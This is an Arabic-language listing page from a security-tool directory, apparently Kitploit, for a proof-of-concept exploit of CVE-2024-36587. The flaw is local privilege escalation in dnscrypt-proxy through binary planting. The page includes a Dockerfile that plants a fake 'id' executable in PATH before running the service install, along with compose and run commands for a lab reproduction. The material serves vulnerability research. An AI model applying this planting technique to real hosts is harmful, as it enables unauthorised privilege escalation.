Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-36587 — استغلال إثبات المفهوم لـ CVE-2024-36587 يوضح تصعيد الامتيازات المحلية في dnscrypt-proxy عبر زراعة ثنائية، مع بيئة إعادة إنتاج قائمة على Docker. | Kitploit
أدوات/GitHubGitHub/meeeeing/cve-2024-36587
تصعيد الامتيازاتأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHubmeeeeing/cve-2024-36587

CVE-2024-36587

استغلال إثبات المفهوم لـ CVE-2024-36587 يوضح تصعيد الامتيازات المحلية في dnscrypt-proxy عبر زراعة ثنائية، مع بيئة إعادة إنتاج قائمة على Docker.

عرض المستودع
4منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-36587 - تصعيد الامتيازات المحلي في dnscrypt-proxy

نظرة عامة

  • وصف الثغرة: عند تثبيت خدمة dnscrypt-proxy، تثق الأداة بالملفات القابلة للتنفيذ في الدليل الحالي وتسجّلها، مما يسمح بإدراج ثنائي خبيث لتصعيد الامتيازات.
  • الإصدارات المتأثرة: dnscrypt-proxy v2.0.0-alpha9 ~ v2.1.5
  • طريقة إثبات المفهوم (PoC): زرع ثنائي (binary planting)

إعداد البيئة

root@kitploit:~
docker compose up --build

بعد اكتمال البناء والتشغيل، يتم إنشاء الحاوية.

الدخول إلى داخل الحاوية:

root@kitploit:~
docker run -it --privileged dnscrypt-poc-poc bash

تشغيل الثغرة

داخل الحاوية:

root@kitploit:~
/tmp/id
cat /tmp/poc_was_here

إذا تم إخراج Pwned_from_Docker تكون عملية إثبات المفهوم (PoC) قد نجحت.

ملفات الإعداد

Dockerfile

root@kitploit:~
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y \
    git \
    golang-go \
    sudo

WORKDIR /workspace

RUN git clone https://github.com/DNSCrypt/dnscrypt-proxy.git && \
    cd dnscrypt-proxy && \
    git checkout tags/2.1.0 && \
    go build -o proxy ./dnscrypt-proxy

RUN bash -c 'echo -e "#!/bin/bash\necho Pwned_from_Docker > /tmp/poc_was_here" > /tmp/id' && \
    chmod +x /tmp/id && \
    ln -sf /tmp/id /usr/local/bin/id

CMD ["./dnscrypt-proxy/proxy", "-service", "install"]

docker-compose.yaml

root@kitploit:~
version: "3.8"

services:
  poc:
    build: .
    container_name: dnscrypt-poc
    privileged: true
    tty: true

المراجع

  • https://github.com/DNSCrypt/dnscrypt-proxy
  • https://nvd.nist.gov/vuln/detail/CVE-2024-36587

لقطة شاشة لنتيجة التجربة

docker build success

التقرير التفصيلي

لمزيد من التحليل التفصيلي ونتائج التجربة، يُرجى مراجعة مستند PDF التالي:

PoC_Report_CVE-2024-36587.pdf

تنزيل الأداة